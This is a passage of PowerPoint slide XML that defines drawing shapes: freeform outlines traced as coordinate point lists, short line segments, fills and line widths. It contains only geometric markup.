                  <a:pt x="0" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="48"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="52"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="55"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="57"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23" y="59"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48" y="67"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72" y="71"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="130" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="146" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="179" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="196" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="211" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="226" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254" y="71"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="279" y="67"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="294" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="298" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="302" y="59"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="307" y="57"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="310" y="55"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="312" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="316" y="52"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="318" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="321" y="48"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="323" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="324" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="324" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="323" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="321" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="318" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="316" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="312" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="310" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="307" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="302" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="298" y="18"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="294" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="279" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="226" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="211" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="196" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="179" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="14288">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10307" name="Line 388"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2687637" y="6973888"/>
            <a:ext cx="131763" cy="1587"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="34925">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10308" name="Line 389"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2938462" y="7072313"/>
            <a:ext cx="115888" cy="3175"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="34925">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10309" name="Line 390"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2809875" y="6973888"/>
            <a:ext cx="133350" cy="98425"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="34925">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10310" name="Line 391"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2687637" y="7070725"/>
            <a:ext cx="131763" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="34925">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10311" name="Line 392"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2938462" y="6970713"/>
            <a:ext cx="115888" cy="3175"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="34925">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10312" name="Line 393"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2809875" y="6970713"/>
            <a:ext cx="133350" cy="100012"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="34925">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10313" name="Freeform 394"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4119562" y="7294563"/>
            <a:ext cx="909638" cy="173037"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T1" fmla="*/ 0 h 77"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T24" fmla="*/ 0 w 403"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T26" fmla="*/ 0 w 403"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T66" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T68" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T70" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T71" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T72" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T73" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T74" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T75" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T76" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T77" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T78" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T79" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T80" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T81" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T82" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T83" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T84" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T85" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T86" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T87" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T88" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T89" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T90" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T91" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T92" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T93" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T94" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T95" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T96" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T97" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T98" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T99" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T100" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T101" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T102" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T103" fmla="*/ 0 h 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3"/>
              <a:gd name="T157" fmla="*/ 0 h 77"/>
              <a:gd name="T158" fmla="*/ 403 w 403"/>
              <a:gd name="T159" fmla="*/ 77 h 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3" h="77">
                <a:moveTo>
                  <a:pt x="202" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="181" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="161" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="123" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="106" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="88" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="48"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="51"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="52"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="55"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="58"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="59"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59" y="67"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66" y="68"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81" y="70"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="88" y="72"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="106" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="123" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="161" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="181" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="202" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="242" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="261" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="280" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="297" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="315" y="72"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="322" y="70"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="330" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="337" y="68"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344" y="67"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="357" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="368" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="374" y="59"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379" y="58"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="384" y="55"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="387" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="391" y="52"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="394" y="51"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="396" y="48"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="399" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="401" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="403" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="401" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="399" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="396" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="394" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="391" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="387" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="384" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="374" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="368" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="357" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="337" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="330" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="322" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="315" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="297" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="280" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="261" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="242" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="202" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="CCCCFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10314" name="Freeform 395"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4119562" y="7294563"/>
            <a:ext cx="909638" cy="173037"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T1" fmla="*/ 0 h 77"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T24" fmla="*/ 0 w 403"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T26" fmla="*/ 0 w 403"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 403"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 77"/>
